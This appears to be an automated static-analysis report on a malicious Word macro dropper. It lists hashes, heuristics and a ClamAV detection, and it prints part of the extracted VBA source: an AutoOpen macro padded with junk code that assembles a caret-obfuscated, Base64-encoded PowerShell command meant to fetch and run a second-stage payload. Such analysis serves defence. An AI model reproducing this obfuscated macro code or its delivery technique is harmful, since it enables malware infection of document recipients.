Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2fa33b23d1c7f3a4…

MALICIOUS

Office (OLE)

Size: 90.2 KB
Created: 2018-08-17 08:16:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 08ed6c46613891f0ba7b9a56ab4ef0ec
SHA-1: d934702210e2b1f83d8da93ca98e2fcd0b9c56c8
SHA-256: 2fa33b23d1c7f3a44d9e49d797cd6c22fc39e02a2f09ed8b84247fb77a494a83
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen entry point runs as soon as the document is opened; it assembles an obfuscated command string and executes it, launching a Base64-encoded PowerShell command. That command is designed to download and execute a second-stage payload, as indicated by the heavily obfuscated string and the use of PowerShell as the launcher. The ClamAV detection name 'Doc.Dropper.Valyria-6666905-0' further supports its role as a dropper.

Heuristics (5)

  • ClamAV: Doc.Dropper.Valyria-6666905-0 (severity: critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6666905-0
  • VBA macros detected (severity: medium; 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43851 bytes
SHA-256: 8394ff315bbee33b2bf614036ed55a6df020367de441e3febdb8be5847555d6f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "RElXjaEFEsoadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kDwtSJIPjsB"
Function QuhNsEsSuK()
On Error Resume Next
ckKFr = "oPIZEc"
   VarType CByte(4)
   IsArray Sin(PqzMhv - cGXvN - 20415 / DubBwk)
lawzOpMYozv = "mD " + "/" + "v ^  ^ " + "/r    " + CStr(Chr(DrlXfAmbVQnKz + nQOqzqoZsUi + 34 + kkGTPVtwsvEB + pzwdTfuWFUv)) + "  SET  " + " "
IsArray Val(jOoAfa)
   ckKFr = CDec(HwPiUi)
   IsArray Sqr(62)
SwwHsDmj = "^ " + "rX" + "B^" + "Q^=po^w" + "^e" + "rs^" + "h^e^l" + "l^ ^-" + "^" + "e^ JA" + "^" + "BRA^Gw" + "^A^bg^"
ckKFr = 6592386
   VarType Str(aztYzY)
   VarType TimeValue(JIHGT * jEIrm * MvcXif / 29611)
lnsFV = "A9" + "AG^4A" + "^" + "ZQ" + "^" + "B.^AC0A" + "b^w^B" + "]A^"
VarType Rnd(qTElSK)
   IsArray Atn(565)
   IsArray 8773
bWJdLoGa = "G^oAZ^" + "QBjA^" + "_^" + "Q^AI^" + "AB^" + "OAG^'^" + "Ad^" + "A"
ckKFr = "bSGER"
   ckKFr = Int(5)
   IsArray Second(GzAit)
SuHRAzOGS = "Au^" + "A/^\^" + "A^Z^QB" + "]^AE" + "^,^Ab" + "^" + "A^B^p" + "A" + "^" + "G'^Ab" + "g" + "B0"
VarType 115
   IsArray Cos(60)
IwwdC = "^A^2s" + "^A^J" + "A" + "BNA/I^" + "AR^QA9" + "^AC" + "\^A^aA"
IsArray CDate(4301)
   IsArray 340
   IsArray 2365
dBUVFIT = "^" + "B0" + "A^_^QA^" + "\A^A^6A" + "C^8^A)^" + "w^B" + "^k^AG^" + "8^Ab"
QuhNsEsSuK = lawzOpMYozv + SwwHsDmj + lnsFV + bWJdLoGa + SuHRAzOGS + IwwdC + dBUVFIT
   VarType Str(227283539)
   IsArray 845
End Function
Function TlduaiiHi()
On Error Resume Next
ckKFr = Second(72058 * cSpElc - 55921 - IspGO)
   VarType LCase(VrZJN)
   IsArray TimeValue(qtHaQY)
NbMSQ = "^Q^Bl" + "^A^_,Ad" + "^A" + "BpAG^," + "^A,gA" + "^x" + "AC4A^" + "[^wBv" + "A" + "G^0" + "^A" + ")w"
IsArray 294798985
   IsArray 3
   IsArray Sin(jIroHw)
LEGZmGR = "B^" + "I" + "A^G^'AV" + "g" + "^BJA"
ckKFr = Rnd(ZRXbGY)
   VarType "TtsUDs"
rddnhn = "2Q^A^'" + "ABA" + "^AGgA" + "^d" + "^A^B^" + "0A^_" + "AAO^g^" + "A" + "v"
IsArray TimeValue(604)
   VarType Tan(134965962)
NpzjcLMP = "AC^" + "8A^b^A" + "Bh^A" + "_^,A^Z" + "QB^yAC" + "^0" + "^A[^w^"
ckKFr = "KEnEZ"
   ckKFr = TimeValue(25)
oGmVH = "BvA^2" + "I" + "^" + "A)^g^Bj" + "^AG8Ab" + "QAu^" + "A" + "^" + "_^AAbA"
ckKFr = Month(zKJGjK + zPTllj)
   IsArray "lzvjVd"
   IsArray Round(sLFwV)
ocRjsJA = "^" + "AvA" + "^2^AA" + "Nw" + "B^_A2" + "QAV^AA4" + "A2," + "^A^Q^A^" + "B^o" + "A"
ckKFr = "LqsWi"
   VarType 9616
   ckKFr = "WiiWw"
tZDlcTZM = "_^Q^Ad^" + "A" + "^B" + "^" + "w^A^" + "2o^" + "A)w^A" + "vA^G" + "sA^\QB" + "zAC^4^A"
IsArray "TbMOzO"
   VarType "MYMKzo"
ZrqSiX = "b^" + "Q^B" + "^l^A" + "C" + "8A," + "Q^B3^" + "A" + "^2[A^e" + "^"
TlduaiiHi = NbMSQ + LEGZmGR + rddnhn + NpzjcLMP + oGmVH + ocRjsJA + tZDlcTZM + ZrqSiX
   ckKFr = "jQnRot"
   VarType CBool(26829 / ZuqNd)
End Function
Function rHfAPtqzw()
On Error Resume Next
IsArray "iaIjkF"
   VarType CByte(9673 * CHnAz * 50146 - KKWDWt)
   IsArray Sin(94)
hjojizCi = "QBXA^_" + "^g^" + "A^" + "\A^BA" + "AG^g" + "^AdA^"
IsArray 4
   ckKFr = CByte(418)
   IsArray 11
IsHPkaOJmPm = "B" + "0A" + "^_AAO^g" + "AvA" + "C8^A" + "b^Q^" + "B^l^A" + "^G^"
ckKFr = 24
   IsArray Atn(16059151)
   VarType CDate(tumCXa)
JJvfWQFBCfp = "Q^Aa^" + "QB" + "v^AG^" + "4^A" + ")g^B]AG" + "^EA)w" + "^BuA" + "_"
ckKFr = Second(86399 - SmtMW + 18190 + FTGiU)
   VarType 8
   ckKFr = "DXkzw"
jVGXKksXm = "o" + "A^e" + "^" + "g^A^y" + "^A/,A"
ckKFr = Int(jOrCi)
   ckKFr = "ZKbHaV"
tzkMvNu = "Q^ABoA^" + "_^QA" + "d^ABw^" + "A" + "2oA)w^A" + "vA_^" + "g^A^bg" + "^AtAC" + "0A^Z^Q"
VarType Atn(apwTC)
   IsArray "bTETL"
   IsArray LCase(XXRnMj + OiDzKa)
HzwfpGqbZi = "^AxA^" + "G^E^" + "A^Z^w" + "B^t^" + "A^G" + ",A" + "Z^w^Bh" + "A" + "G^\" + "AZ^A" + "^Br^"
rHfAPtqzw = hjojizCi + IsHPkaOJmPm + JJvfWQFBCfp + jVGXKksXm + tzkMvNu + HzwfpGqbZi
   ckKFr = Str(nAjXcQ + TjwBR * CFbDqT - rEnTNl)
   IsArray Atn(2)
End 
... (truncated)